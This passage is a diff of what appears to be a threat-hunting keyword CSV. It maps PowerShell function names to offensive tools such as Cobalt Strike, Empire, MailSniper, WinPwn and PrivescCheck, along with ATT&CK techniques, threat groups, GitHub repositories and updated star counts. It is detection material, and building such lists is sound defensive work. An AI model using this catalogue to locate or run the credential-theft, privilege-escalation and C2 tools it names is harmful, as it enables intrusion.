- T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" 
"*Invoke-FileFinder*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*Invoke-FileFinder*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-FodHelperBypass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-FodHelperBypass.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-FodHelperBypass*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1127","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ForgeUserAgent*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" -"*Invoke-Get-RBCD-Threaded*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" 
-"*Invoke-Get-RBCD-Threaded*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-GlobalMailSearch*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-GlobalMailSearch*","offensive_tool_keyword","MailSniper","To search all mailboxes in a domain","T1595 T1114 T1590 T1591 T1114","N/A","N/A","N/A","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-GlobalO365MailSearch*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-FileFinder*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-FodHelperBypass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-FodHelperBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-FodHelperBypass*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1127","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ForgeUserAgent*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*Invoke-Get-RBCD-Threaded*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" 
+"*Invoke-Get-RBCD-Threaded*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-GlobalMailSearch*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-GlobalMailSearch*","offensive_tool_keyword","MailSniper","To search all mailboxes in a domain","T1595 T1114 T1590 T1591 T1114","N/A","N/A","N/A","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-GlobalO365MailSearch*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-GoFetch*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" -"*Invoke-Gopher*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Gopher*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*Invoke-GPPPasswordCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-GPPPasswordCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation 
Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-Grouper2*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Grouper2*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-Grouper3*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Grouper3*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-HandleKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-HandleKatz*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-Handlekatz*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-HardenedUNCPathCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-GPPPasswordCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Grouper2*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Grouper2*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest 
AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Grouper3*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Grouper3*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-HandleKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-HandleKatz*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Handlekatz*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-HardenedUNCPathCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-HijackableDllsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-HijackableDllsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-HijackableDllsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-HoneypotBuster*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","1","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" 
"*Invoke-HostEnum -*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" -"*invoke-hostenum -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*invoke-hostenum -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Invoke-HostEnum*","offensive_tool_keyword","red-team-scripts","script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain. it can also perform limited domain enumeration with the -Domain switch","T1016 - T1087.001 - T1049 - T1069","TA0007 - TA0003 - TA0006","N/A","N/A","Discovery","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*Invoke-HostRecon*","offensive_tool_keyword","HostRecon","Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. 
or other system commands to help avoid detection.","T1082 - T1087 - T1033","TA0001 - TA0007 - ","N/A","N/A","Information Gathering","https://github.com/dafthack/HostRecon","1","1","N/A","N/A","5","401","114","2017-10-03T13:25:06Z","2017-03-28T14:53:21Z" -"*invoke-hostscan*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-HotFixVulnCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*invoke-hostscan*","offensive_tool_keyword","poshc2","keywords from 